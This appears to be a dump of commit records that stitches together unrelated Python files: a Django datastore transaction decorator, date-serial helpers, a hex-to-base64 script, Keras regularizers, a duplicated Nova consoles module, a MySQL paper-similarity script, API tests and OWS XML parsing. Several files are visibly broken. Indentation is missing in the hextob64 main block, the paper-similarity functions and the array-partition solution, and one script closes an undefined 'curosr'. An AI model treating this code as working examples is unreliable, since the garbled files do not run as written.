from google.appengine.datastore.datastore_rpc import TransactionOptions
from djangae.db.backends.appengine import caching
class AtomicDecorator(object):
    """Decorator/context manager wrapping code in a datastore transaction.

    Supports bare use (@atomic), parameterised use (@atomic(xg=True)),
    and `with atomic(...):`.  independent=True suspends the current
    transaction (parent_conn) and runs a new one.
    """
    def __init__(self, *args, **kwargs):
        self.func = None
        self.xg = kwargs.get("xg")
        self.independent = kwargs.get("independent")
        self.parent_conn = None

        # Bare-decorator form: the function arrives directly.
        if len(args) == 1 and callable(args[0]):
            self.func = args[0]

    def _begin(self):
        options = CreateTransactionOptions(
            xg = True if self.xg else False,
            propagation = TransactionOptions.INDEPENDENT if self.independent else None
        )

        if IsInTransaction() and not self.independent:
            raise RuntimeError("Nested transactions are not supported")
        elif self.independent:
            # If we're running an independent transaction, pop the current one
            self.parent_conn = _PopConnection()

        # Push a new connection, start a new transaction
        conn = _GetConnection()
        _PushConnection(None)
        _SetConnection(conn.new_transaction(options))

        # Clear the context cache at the start of a transaction
        caching.clear_context_cache()

    def _finalize(self):
        _PopConnection() # Pop the transaction connection
        if self.parent_conn:
            # If there was a parent transaction, now put that back
            _PushConnection(self.parent_conn)
            self.parent_conn = None

        # Clear the context cache at the end of a transaction
        caching.clear_context_cache()

    def __call__(self, *args, **kwargs):
        def call_func(*_args, **_kwargs):
            # Begin, run, commit; roll back on any error; always finalize.
            try:
                self._begin()
                result = self.func(*_args, **_kwargs)
                _GetConnection().commit()
                return result
            except:
                conn = _GetConnection()
                if conn:
                    conn.rollback()
                raise
            finally:
                self._finalize()

        if not self.func:
            # Parameterised decorator: this call supplies the function.
            assert args and callable(args[0])
            self.func = args[0]
            return call_func

        if self.func:
            return call_func(*args, **kwargs)

    def __enter__(self):
        self._begin()

    def __exit__(self, *args, **kwargs):
        # args is (exc_type, exc_value, traceback) on failure.
        if len(args) > 1 and isinstance(args[1], Exception):
            _GetConnection().rollback() # If an exception happens, rollback
        else:
            _GetConnection().commit() # Otherwise commit

        self._finalize()

atomic = AtomicDecorator
commit_on_success = AtomicDecorator # Alias to the old Django name for this kinda thing
| Python | 0.000012 |
a0d196af4d3854365bedb581d25d73af3271cb1a | add python script file | mydatetime.py | mydatetime.py | #!/usr/bin/python
from datetime import datetime,timedelta
import numpy
# -----------------------------------------------------------------
# mydatetime v0.2 for python
# Copyright (c) 2007 t.hada
# -----------------------------------------------------------------
###
# This script is convert from/into date into/from serial date
# Excels count 1900/2/29 (ref. Microsoft Help & Support No. 214019),
# but python don't count. Thus, return value from this script
# `toSerial()' is equals only after 1900/3/1
#
# if you need valid serial date, change base date `__ZERODATE'
# from (datetime.datetime(1970,1,1),25569)
# to (datetime.datetime(1900,1,1),1)
class mydatetime(datetime):
    """datetime subclass converting to/from spreadsheet serial dates.

    Arithmetic with timedelta returns mydatetime (not plain datetime),
    and strftime supports a %u placeholder for milliseconds.
    """
    # base date: (datetime at serial origin, its serial number)
    # to identify Excels
    __ZERODATE=(datetime(1970,1,1,0,0,0,0),25569)
    # to return valid serial date
    #__ZERODATE=(datetime(1900,1,1,0,0,0,0),1)

    # format token that expresses milliseconds
    __MILLIFMT='%u'

    # constructor
    def __init__(self,year,month,day,\
            hour=0,minute=0,second=0,microsecond=0,tzinfo=0):
        try:
            # call parent's constructor
            # NOTE(review): called without `self`, so `year` is bound to
            # datetime.__init__'s self parameter; datetime is immutable
            # (initialised in __new__), so this is effectively a no-op.
            datetime.__init__(year,month,day,hour,\
                    minute,second,microsecond,tzinfo)
        except: raise

    def __sub__(self,t):
        # if return value is <type 'timedelta'>
        # (i.e. subtracting another datetime/mydatetime): defer to parent.
        if t.__class__ == self.__class__ or \
                t.__class__ == self.__ZERODATE[0].__class__:
            return datetime.__sub__(self,t)
        # else (mydatetime-timedelta) should be mydatetime
        else:
            tmp=datetime.__sub__(self,t)
            return mydatetime(tmp.year,tmp.month,tmp.day,tmp.hour,\
                    tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)

    def __add__(self,t):
        # if return value is <type 'timedelta'>
        if t.__class__ == self.__class__ or \
                t.__class__ == self.__ZERODATE[0].__class__:
            return datetime.__add__(self,t)
        # else (mydatetime+timedelta) should be mydatetime
        else:
            tmp=datetime.__add__(self,t)
            return mydatetime(tmp.year,tmp.month,tmp.day,tmp.hour,\
                    tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)

    def strftime(self,fmt):
        # Replace each %u (outside literal %%) with zero-padded
        # milliseconds, then hand the result to datetime.strftime.
        tmp=[]
        for i in fmt.split('%%'):
            tmp.append(('%06d'%self.microsecond)[:3]\
                    .join(i.split(self.__MILLIFMT)))
        return datetime.strftime(self,'%%'.join(tmp))

    # return serial date (days since __ZERODATE, fractional part = time)
    def toSerial(self):
        tmp=self-self.__ZERODATE[0]
        serial_val=self.__ZERODATE[1]+tmp.days
        serial_val=serial_val+float(tmp.seconds)/24/3600\
                +float(tmp.microseconds)/24/3600/1000000
        return serial_val

def fromTuple(d,t=(0,0,0)):
    """Build a mydatetime from d=(year,month,day), t=(hour,min,sec[,usec]).

    sec may be float; its fractional part becomes microseconds (and
    takes precedence over an explicit 4th element).
    """
    try:
        if type(t[2]) is float: f=int(t[2]*1000000-int(t[2])*1000000)
        elif len(t)>=4: f=t[3]
        else: f=0
        # call parent's constructor
        return mydatetime(d[0],d[1],d[2],t[0],t[1],int(t[2]),f)
    except: raise

# return mydatetime from serial value
def fromSerial(val):
    """Convert a serial date number back to a mydatetime (ms precision)."""
    tmp=val-mydatetime._mydatetime__ZERODATE[1]
    day=int(tmp)
    sec=round((tmp-day)*24*3600,3)
    dt=timedelta(days=day,seconds=sec)
    tmp=mydatetime._mydatetime__ZERODATE[0]+dt
    return mydatetime(tmp.year,tmp.month,tmp.day,\
            tmp.hour,tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def Serial2Sec(val, comp=False):
    """Convert serial date(s) to seconds, rounded to milliseconds.

    Parameters
    ----------
    val : float, list or numpy.ndarray
        Serial date value(s) in days (possibly fractional).
    comp : bool
        If False (default), return the seconds within the day (the
        fractional part of the serial date, in seconds).  If True,
        return complete seconds elapsed since __ZERODATE.

    Returns
    -------
    numpy scalar or array of seconds, rounded to 3 decimals.

    Notes
    -----
    Fixes over the previous version: removed no-op ``numpy.array(...)``
    calls whose results were discarded, and an unreachable trailing
    branch that referenced an undefined name ``ret``.
    """
    c = 24 * 3600  # seconds per day
    if not comp:
        # Fractional part of the serial date, expressed in seconds.
        # (int truncation matches the original behaviour.)
        return numpy.round((val - numpy.array(val, dtype=int)) * c, 3)
    # Complete seconds since the serial epoch (__ZERODATE).
    val = val - mydatetime._mydatetime__ZERODATE[1]
    return numpy.round((val - numpy.array(val, dtype=int)) * c
                       + numpy.array(val, dtype=int) * c, 3)
| Python | 0.000002 | |
30bb73da2b75b5cfcaadf743762bccb119b2c147 | First challenge converted to Python 3 | set1/ch1/hextob64.py | set1/ch1/hextob64.py | #!/usr/bin/python3
"""
The string:
49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d
Should produce:
SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t
"""
import argparse
import base64
import sys
def hextobase64(hexstr):
    """Return the base64 encoding of the bytes represented by *hexstr*.

    Decodes the hex string to raw bytes and base64-encodes them
    directly.  The previous round-trip through UTF-8 text produced the
    same output for valid UTF-8 payloads but raised UnicodeDecodeError
    on arbitrary binary data; this version works for any byte values.
    """
    return base64.b64encode(bytes.fromhex(hexstr)).decode('ascii')
def main(hexstring):
    """Print the base64 form of *hexstring*; return exit status 0."""
    encoded = hextobase64(hexstring)
    print(encoded)
    return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Convert a hex string to base64.')
parser.add_argument('hex', help='hex string')
args = parser.parse_args()
sys.exit(main(args.hex))
| Python | 0.999736 | |
3129819c7d2ff3b35dd0270c0a27ef694a7e4d9e | Add regularizers.py | seya/regularizers.py | seya/regularizers.py | from keras.regularizers import Regularizer
class GaussianKL(Regularizer):
    """KL(q || N(0, 1)) regularizer for a Gaussian latent layer.

    Adds the mean KL divergence between the layer's predicted Gaussian
    and a standard normal prior to the loss, as in "Auto-Encoding
    Variational Bayes" (Kingma & Welling, 2014).
    """
    def set_param(self, p):
        # Kept for the Regularizer interface; p is not used directly.
        self.p = p

    def set_layer(self, layer):
        self.layer = layer

    def __call__(self, loss):
        # See Variational Auto-Encoding Bayes by Kingma and Welling.
        # Bug fix: the previous code unpacked the second output but then
        # read the never-assigned attribute self.logsigma, raising
        # AttributeError.  Use the unpacked value instead.
        # NOTE(review): assumes the layer's second output is log(sigma)
        # — consistent with the exp(2 * logsigma) = sigma^2 term below;
        # confirm against the encoder layer's output convention.
        mean, logsigma = self.layer.get_output(True)
        # Per-dimension KL(N(mean, sigma) || N(0, 1)):
        #   -1/2 - log(sigma) + (mean^2 + sigma^2) / 2
        # NOTE: `T` (theano.tensor) must be imported at module level.
        kl = -.5 - logsigma + .5 * (mean**2 + T.exp(2 * logsigma))
        loss += kl.mean()
        return loss

    def get_config(self):
        return {"name": self.__class__.__name__}
class SimpleCost(Regularizer):
    """Regularizer that adds a precomputed cost term to the loss."""

    def set_param(self, cost):
        # The extra cost expression to be added when the regularizer runs.
        self.cost = cost

    def __call__(self, loss):
        return loss + self.cost

    def get_config(self):
        return {"name": self.__class__.__name__}
| Python | 0 | |
0a47253307d427c6e668d7cdf3bdf186dfc93858 | Fix the ConsolesController class doc string | nova/api/openstack/compute/contrib/consoles.py | nova/api/openstack/compute/contrib/consoles.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
authorize = extensions.extension_authorizer('compute', 'consoles')
class ConsolesController(wsgi.Controller):
    """Adds the os-getVNCConsole / os-getSPICEConsole server actions."""
    def __init__(self, *args, **kwargs):
        self.compute_api = compute.API()
        super(ConsolesController, self).__init__(*args, **kwargs)

    @wsgi.action('os-getVNCConsole')
    def get_vnc_console(self, req, id, body):
        """Get vnc connection information to access a server."""
        context = req.environ['nova.context']
        authorize(context)

        # If type is not supplied or unknown, get_vnc_console below will cope
        console_type = body['os-getVNCConsole'].get('type')

        try:
            instance = self.compute_api.get(context, id)
            output = self.compute_api.get_vnc_console(context,
                                                      instance,
                                                      console_type)
        except exception.InstanceNotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.InstanceNotReady as e:
            raise webob.exc.HTTPConflict(
                explanation=_('Instance not yet ready'))

        return {'console': {'type': console_type, 'url': output['url']}}

    @wsgi.action('os-getSPICEConsole')
    def get_spice_console(self, req, id, body):
        """Get spice connection information to access a server."""
        context = req.environ['nova.context']
        authorize(context)

        # If type is not supplied or unknown, get_spice_console below will cope
        console_type = body['os-getSPICEConsole'].get('type')

        try:
            instance = self.compute_api.get(context, id)
            output = self.compute_api.get_spice_console(context,
                                                        instance,
                                                        console_type)
        except exception.InstanceNotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.InstanceNotReady as e:
            raise webob.exc.HTTPConflict(explanation=e.format_message())

        return {'console': {'type': console_type, 'url': output['url']}}

    def get_actions(self):
        """Return the actions the extension adds, as required by contract."""
        actions = [extensions.ActionExtension("servers", "os-getVNCConsole",
                                              self.get_vnc_console),
                   extensions.ActionExtension("servers", "os-getSPICEConsole",
                                              self.get_spice_console)]
        return actions


class Consoles(extensions.ExtensionDescriptor):
    """Interactive Console support."""
    name = "Consoles"
    alias = "os-consoles"
    namespace = "http://docs.openstack.org/compute/ext/os-consoles/api/v2"
    updated = "2011-12-23T00:00:00+00:00"

    def get_controller_extensions(self):
        # Attach the console actions to the existing "servers" resource.
        controller = ConsolesController()
        extension = extensions.ControllerExtension(self, 'servers', controller)
        return [extension]
| # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
authorize = extensions.extension_authorizer('compute', 'consoles')
class ConsolesController(wsgi.Controller):
    """Adds the os-getVNCConsole / os-getSPICEConsole server actions."""
    def __init__(self, *args, **kwargs):
        self.compute_api = compute.API()
        super(ConsolesController, self).__init__(*args, **kwargs)

    @wsgi.action('os-getVNCConsole')
    def get_vnc_console(self, req, id, body):
        """Get vnc connection information to access a server."""
        context = req.environ['nova.context']
        authorize(context)

        # If type is not supplied or unknown, get_vnc_console below will cope
        console_type = body['os-getVNCConsole'].get('type')

        try:
            instance = self.compute_api.get(context, id)
            output = self.compute_api.get_vnc_console(context,
                                                      instance,
                                                      console_type)
        except exception.InstanceNotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.InstanceNotReady as e:
            raise webob.exc.HTTPConflict(
                explanation=_('Instance not yet ready'))

        return {'console': {'type': console_type, 'url': output['url']}}

    @wsgi.action('os-getSPICEConsole')
    def get_spice_console(self, req, id, body):
        """Get spice connection information to access a server."""
        context = req.environ['nova.context']
        authorize(context)

        # If type is not supplied or unknown, get_spice_console below will cope
        console_type = body['os-getSPICEConsole'].get('type')

        try:
            instance = self.compute_api.get(context, id)
            output = self.compute_api.get_spice_console(context,
                                                        instance,
                                                        console_type)
        except exception.InstanceNotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.InstanceNotReady as e:
            raise webob.exc.HTTPConflict(explanation=e.format_message())

        return {'console': {'type': console_type, 'url': output['url']}}

    def get_actions(self):
        """Return the actions the extension adds, as required by contract."""
        actions = [extensions.ActionExtension("servers", "os-getVNCConsole",
                                              self.get_vnc_console),
                   extensions.ActionExtension("servers", "os-getSPICEConsole",
                                              self.get_spice_console)]
        return actions


class Consoles(extensions.ExtensionDescriptor):
    """Interactive Console support."""
    name = "Consoles"
    alias = "os-consoles"
    namespace = "http://docs.openstack.org/compute/ext/os-consoles/api/v2"
    updated = "2011-12-23T00:00:00+00:00"

    def get_controller_extensions(self):
        # Attach the console actions to the existing "servers" resource.
        controller = ConsolesController()
        extension = extensions.ControllerExtension(self, 'servers', controller)
        return [extension]
| Python | 0.996907 |
e0eb68fa33dc6dea9f1b4a0f6cb1161e4128cfd7 | add paper sim by summary | recommendation/paper_sim_by_summary.py | recommendation/paper_sim_by_summary.py | import MySQLdb
import sys
sys.path.append("../../include/python/")
from paper import Paper
import math
from operator import itemgetter
def getWordFreq():
connection1 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor1 = connection1.cursor()
cursor1.execute("select id, titile, abstract from paper where length(abstract) > 50")
ret = dict()
numrows = int(cursor1.rowcount)
for k in range(numrows):
if k % 10000 == 0:
print k
row = cursor1.fetchone()
paper_id = row[0]
entities = dict()
words = (row[1] + " " + row[2].lower()).split()
for word in words:
if word not in ret:
ret[word] = 1
else:
ret[word] = ret[word] + 1
cursor1.close()
connection1.close()
return ret
def generatePaperEntities():
    """Rebuild tmp_paper_entities with per-paper term weights.

    Words occurring more than 200 times corpus-wide are discarded as
    too common; remaining words get integer ids assigned on first
    sight, and each paper's per-word counts are stored as weights.
    """
    word_freq = getWordFreq()
    connection1 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
    cursor1 = connection1.cursor()
    connection2 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
    cursor2 = connection2.cursor()
    cursor2.execute("truncate table tmp_paper_entities;")
    # `titile` matches the (misspelled) column name in the DB schema.
    cursor1.execute("select id, titile, abstract from paper where length(abstract) > 50")
    entity_dict = dict()
    numrows = int(cursor1.rowcount)
    for k in range(numrows):
        if k % 10000 == 0:
            print k
        row = cursor1.fetchone()
        paper_id = row[0]
        entities = dict()
        words = (row[1] + " " + row[2].lower()).split()
        for word in words:
            # Skip words outside the frequency table or too common.
            if word not in word_freq:
                continue
            if word_freq[word] > 200:
                continue
            if word not in entities:
                entities[word] = 1
            else:
                entities[word] = entities[word] + 1
        for (entity,weight) in entities.items():
            # Assign a fresh id on first sight; otherwise reuse it.
            entity_id = len(entity_dict)
            if entity in entity_dict:
                entity_id = entity_dict[entity]
            else:
                entity_dict[entity] = entity_id
            cursor2.execute("replace into tmp_paper_entities (paper_id, entity_id, weight) values (%s, %s, %s)", (paper_id, entity_id, weight))
    cursor1.close()
    connection1.close()
    cursor2.close()
    connection2.close()
def paperSim():
connection = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor = connection.cursor()
cursor.execute("truncate table papersim_summary;")
for mod in range(20):
simTable = dict()
cursor.execute("select paper_id, entity_id from tmp_paper_entities order by entity_id;")
numrows = int(cursor.rowcount)
print numrows
prev_entity = -1
papers = []
for k in range(numrows):
if k % 100000 == 0:
print k
row = cursor.fetchone()
entity_id = row[1]
paper_id = row[0]
if prev_entity != entity_id:
if len(papers) < 200:
for i in papers:
if i % 20 != mod:
continue
if i not in simTable:
simTable[i] = dict()
for j in papers:
if i == j:
continue
if j not in simTable[i]:
simTable[i][j] = 0
weight = 1 / math.log(2 + len(papers))
simTable[i][j] = simTable[i][j] + weight
prev_entity = entity_id
papers = []
papers.append(paper_id)
print len(simTable)
n = 0
for i, rels in simTable.items():
n = n + 1
if n % 10000 == 0:
print n
k = 0
for j, weight in sorted(rels.items(), key = itemgetter(1), reverse = True):
cursor.execute("replace into papersim_summary(src_id, dst_id, weight) values (%s, %s, %s);", (i, j, weight))
k = k + 1
if k > 10:
break
connection.commit()
curosr.close()
connection.close()
#generatePaperEntities()
paperSim()
| Python | 0.000001 | |
bdb75567519914386da7f1d598c6c7aaf96d8e02 | Add sql solution for 561. Array Partition I | py/array-partition-i.py | py/array-partition-i.py | class Solution(object):
def arrayPairSum(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
return sum(sorted(nums)[::2])
| Python | 0.999996 | |
7275a50343cba5073dc2fa77e2e964daec002c38 | move refactored OttTestCase to utils | ott/utils/tests/ott_test_case.py | ott/utils/tests/ott_test_case.py | import os
import sys
import unittest
import urllib
import contextlib
from ott.utils import config_util
from ott.utils import file_utils
class OttTestCase(unittest.TestCase):
    """Base TestCase for OTT web-service tests.

    setUp reads host/port/path settings from development.ini; helpers
    build service URLs, fetch them, and assert regexes against the
    response body.  When ott.test_urlfile is configured, every URL
    built is appended to that file.
    """
    # Defaults; overridden in setUp from development.ini when present.
    domain = "localhost"
    port = "33333"
    path = None
    url_file = None

    def get_url(self, svc_name, params=None, lang=None):
        """Build a service URL; the logged copy has spaces as '+'.

        NOTE(review): when lang is given without params the locale is
        appended with '&' and no '?' — confirm callers always pass
        params alongside lang.
        """
        if self.path:
            ret_val = "http://{}:{}/{}/{}".format(self.domain, self.port, self.path, svc_name)
        else:
            ret_val = "http://{}:{}/{}".format(self.domain, self.port, svc_name)
        if params:
            ret_val = "{0}?{1}".format(ret_val, params)
        if lang:
            ret_val = "{0}&_LOCALE_={1}".format(ret_val, lang)
        if self.url_file:
            url = ret_val.replace(" ", "+")
            self.url_file.write(url)
            self.url_file.write("\n")
        return ret_val

    def call_url(self, url):
        """GET *url* and return the raw response body."""
        ret_json = None
        with contextlib.closing(urllib.urlopen(url)) as f:
            ret_json = f.read()
        return ret_json

    def setUp(self):
        # Pull test settings from development.ini at the project root;
        # ott.test_port wins over ott.svr_port when both are present.
        dir = file_utils.get_project_root_dir()
        ini = config_util.ConfigUtil('development.ini', run_dir=dir)

        port = ini.get('ott.test_port', 'app:main')
        if not port:
            port = ini.get('ott.svr_port', 'app:main', self.port)
        self.port = port

        url_file = ini.get('ott.test_urlfile', 'app:main')
        if url_file:
            # Append mode so successive test runs accumulate URLs.
            self.url_file = open(os.path.join(dir, url_file), "a+")

        test_domain = ini.get('ott.test_domain', 'app:main')
        if test_domain:
            self.domain = test_domain

        test_path = ini.get('ott.test_path', 'app:main')
        if test_path:
            self.path = test_path

    def tearDown(self):
        if self.url_file:
            # Bug fix: previously bare `url_file.flush()/.close()`,
            # which raised NameError — the attribute lives on self.
            self.url_file.flush()
            self.url_file.close()

    def call_url_match_list(self, url, list):
        """Fetch *url* and assert each regex in *list* matches the body."""
        u = self.call_url(url)
        for l in list:
            self.assertRegexpMatches(u, l)

    def call_url_match_string(self, url, str):
        """Fetch *url* and assert that regex *str* matches the body."""
        u = self.call_url(url)
        self.assertRegexpMatches(u, str)
| Python | 0.000001 | |
e07c699caf699852c98b3396150b343553a386c4 | Add tests for language api | server/tests/api/test_language_api.py | server/tests/api/test_language_api.py | import json
from server.tests.helpers import FlaskTestCase, fixtures
class TestLanguageAPI(FlaskTestCase):
    """Integration tests for the /api/languages endpoints."""

    @fixtures('base.json')
    def test_get_empty_languages(self):
        """Test GET /api/languages endpoint with no data"""
        response, data = self.api_request('get', '/api/languages')
        # Bug fix: was `is 0` — identity comparison on an int is
        # implementation-dependent; compare by value instead.
        assert data['num_results'] == 0
        assert response.status_code == 200

    @fixtures('single_language.json')
    def test_get_one_language(self):
        """Test GET /api/languages endpoint with a single language"""
        response, data = self.api_request('get', '/api/languages')
        # Bug fix: was `is 1` — value comparison, not identity.
        assert data['num_results'] == 1
        assert response.status_code == 200

    @fixtures('many_languages.json')
    def test_get_multiple_languages(self):
        """Test GET /api/languages endpoint with multiple languages"""
        response, data = self.api_request('get', '/api/languages')
        assert data['num_results'] > 0
        assert response.status_code == 200

    @fixtures('many_languages.json')
    def test_get_no_language_by_id(self):
        """Test GET /api/languages/(int:id) for missing language"""
        response, data = self.api_request('get', '/api/languages/1000')
        assert response.status_code == 404

    @fixtures('many_languages.json')
    def test_language_by_id(self):
        """Test GET /api/languages(int:id) for existing language"""
        response, data = self.api_request('get', '/api/languages/1')
        assert data['language'] == 'Python'
        assert response.status_code == 200

    @fixtures('single_user.json')
    def test_post_language(self):
        """Tests POST to /api/languages for an authorized user"""
        self.login()
        data = {
            'language': 'some_value'
        }
        response = self.app.post(
            '/api/languages',
            data=json.dumps(data)
        )
        assert response.status_code == 201

    @fixtures('base.json')
    def test_post_language_unauthorized(self):
        """Tests POST to /api/languages for an unauthorized user"""
        data = {
            'language': 'some_value'
        }
        response = self.app.post(
            '/api/languages',
            data=json.dumps(data)
        )
        assert response.status_code == 401
| Python | 0 | |
5f56abf2e3bef6d7947b08603b86f59254bed000 | add support for OGC Web Services Common 1.1.0 (#172) | owslib/ows.py | owslib/ows.py | # -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2008 Tom Kralidis
#
# Authors : Tom Kralidis <tomkralidis@hotmail.com>
#
# Contact email: tomkralidis@hotmail.com
# =============================================================================
"""
API for OGC Web Services Common (OWS) constructs and metadata.
OWS Common: http://www.opengeospatial.org/standards/common
Currently supports version 1.1.0 (06-121r3).
"""
from owslib.etree import etree
from owslib import util
OWS_NAMESPACE_1_0_0 = 'http://www.opengis.net/ows'
OWS_NAMESPACE_1_1_0 = 'http://www.opengis.net/ows/1.1'
XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'
XLINK_NAMESPACE = 'http://www.w3.org/1999/xlink'
class OwsCommon(object):
    """Holds the OWS Common version and its matching XML namespace."""
    def __init__(self, version):
        # Any version other than 1.0.0 is treated as 1.1.0.
        self.version = version
        self.namespace = (OWS_NAMESPACE_1_0_0 if version == '1.0.0'
                          else OWS_NAMESPACE_1_1_0)
class ServiceIdentification(object):
    """Initialize an OWS Common ServiceIdentification construct"""
    def __init__(self,infoset,namespace):
        # Parse title, abstract, keywords, constraints, fees, service
        # type and version from the ServiceIdentification element.
        self._root = infoset
        val = self._root.find(util.nspath('Title', namespace))
        self.title = util.testXMLValue(val)
        val = self._root.find(util.nspath('Abstract', namespace))
        self.abstract = util.testXMLValue(val)
        self.keywords = [f.text for f in self._root.findall(util.nspath('Keywords/Keyword', namespace))]
        val = self._root.find(util.nspath('AccessConstraints', namespace))
        self.accessconstraints = util.testXMLValue(val)
        val = self._root.find(util.nspath('Fees', namespace))
        self.fees = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceType', namespace))
        self.type = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceTypeVersion', namespace))
        self.version = util.testXMLValue(val)

class ServiceProvider(object):
    """Initialize an OWS Common ServiceProvider construct"""
    def __init__(self, infoset,namespace):
        self._root = infoset
        val = self._root.find(util.nspath('ProviderName', namespace))
        self.name = util.testXMLValue(val)
        self.contact = ServiceContact(infoset, namespace)

class ServiceContact(object):
    """Initialize an OWS Common ServiceContact construct"""
    def __init__(self, infoset,namespace):
        self._root = infoset
        val = self._root.find(util.nspath('ProviderName', namespace))
        self.name = util.testXMLValue(val)
        # NOTE(review): self.name is reassigned from IndividualName
        # below, so the ProviderName value read here is discarded —
        # confirm whether a separate attribute was intended.
        val = self._root.find(util.nspath('ProviderSite', namespace))
        if val is not None:
            self.site = util.testXMLValue(val.attrib.get(util.nspath('href', XLINK_NAMESPACE)), True)
        else:
            self.site = None
        val = self._root.find(util.nspath('ServiceContact/Role', namespace))
        self.role = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/IndividualName', namespace))
        self.name = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/PositionName', namespace))
        self.position = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Phone/Voice', namespace))
        self.phone = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Phone/Facsimile', namespace))
        self.fax = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/DeliveryPoint', namespace))
        self.address = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/City', namespace))
        self.city = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/AdministrativeArea', namespace))
        self.region = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/PostalCode', namespace))
        self.postcode = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/Country', namespace))
        self.country = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/Address/ElectronicMailAddress', namespace))
        self.email = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/OnlineResource', namespace))
        if val is not None:
            self.url = util.testXMLValue(val.attrib.get(util.nspath('href', XLINK_NAMESPACE)), True)
        else:
            self.url = None
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/HoursOfService', namespace))
        self.hours = util.testXMLValue(val)
        val = self._root.find(util.nspath('ServiceContact/ContactInfo/ContactInstructions', namespace))
        self.instructions = util.testXMLValue(val)

class OperationsMetadata(object):
    """Initialize an OWS OperationMetadata construct"""
    def __init__(self,elem,namespace):
        self.name = elem.attrib['name']
        self.formatOptions = ['text/xml']
        methods = []
        # One (operation-name, {'url': ...}) pair per HTTP verb element.
        # NOTE(review): every pair uses the same key (self.name), so
        # dict() keeps only the last verb's URL — confirm intended.
        for verb in elem.find(util.nspath('DCP/HTTP', namespace)):
            methods.append((self.name, {'url': verb.attrib[util.nspath('href', XLINK_NAMESPACE)]}))
        self.methods = dict(methods)
class BoundingBox(object):
    """Initialize an OWS Common BoundingBox construct.

    Parses the crs attribute plus LowerCorner (minx, miny) and
    UpperCorner (maxx, maxy); a missing corner leaves its coordinates
    as None.
    """
    def __init__(self, elem, namespace):
        val = elem.attrib.get('crs')
        self.crs = util.testXMLValue(val, True)
        val = elem.find(util.nspath('LowerCorner', namespace))
        if val is not None:
            tmp = util.testXMLValue(val)
            self.minx, self.miny = tmp.split()
        else:
            # Bug fix: `self.minx, self.miny = None` raised TypeError
            # (cannot unpack None); assign each coordinate separately.
            self.minx = None
            self.miny = None
        val = elem.find(util.nspath('UpperCorner', namespace))
        if val is not None:
            tmp = util.testXMLValue(val)
            self.maxx, self.maxy = tmp.split()
        else:
            # Same fix as above for the upper corner.
            self.maxx = None
            self.maxy = None
class ExceptionReport(object):
    """Initialize an OWS Common ExceptionReport construct"""
    def __init__(self, elem, namespace):
        # Each Exception element becomes a dict with exceptionCode,
        # locator and ExceptionText keys (values may be None).
        self.exceptions = []
        for i in elem.findall(util.nspath('Exception', namespace)):
            tmp = {}
            val = i.attrib.get('exceptionCode')
            tmp['exceptionCode'] = util.testXMLValue(val, True)
            val = i.attrib.get('locator')
            tmp['locator'] = util.testXMLValue(val, True)
            val = i.find(util.nspath('ExceptionText', namespace))
            tmp['ExceptionText'] = util.testXMLValue(val)
            self.exceptions.append(tmp)
| Python | 0 | |
6e736a48f8c49b8257305125742d89cb7f729fbc | index Ansible source versions | shotglass/make_ver_ansible.py | shotglass/make_ver_ansible.py | #!/usr/bin/env python
'''
make_versions -- index many versions of a project
ALPHA code, will need modification for general use.
'''
import re
import subprocess
import sys
import git
